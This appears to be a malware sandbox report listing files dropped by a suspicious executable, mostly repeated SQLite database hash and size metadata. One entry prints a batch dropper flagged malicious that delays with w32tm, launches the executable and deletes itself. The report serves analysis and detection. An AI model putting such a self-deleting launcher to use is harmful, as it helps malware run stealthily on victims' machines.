                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):126976
Entropy (8bit):0.47147045728725767
Encrypted:false
SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:false
Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):218
Entropy (8bit):5.177909013442466
Encrypted:false
SSDEEP:6:hCijTg3Nou1SV+DEimWXpIyEyKOZG1wkn23fdxh:HTg9uYDEoIypflX
MD5:2471D4EFD2195043CEDD2AC4FB31488F
SHA1:F9506B88BD4464D522BF020D2B27F6A32317AE49
SHA-256:7D38380C5CE1F5749C18FCB50F884D403E6979D6580DD712AC61EEEF153AA550
SHA-512:739F9C60DB594DC08DCBC4CDEFE2CEDE8DF85C524911BAEC70EE3179B03D657E696C5EE59F6305F528DEDC5E61FCBF53C24E7348BB5184880BDF3C9DB1E8467A
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2K3wfCcSpW.bat"
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7873599747470391
Encrypted:false
SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5707520969659783
Encrypted:false
SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:9F6D153D934BCC50E8BC57E7014B201A
SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):98304
                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
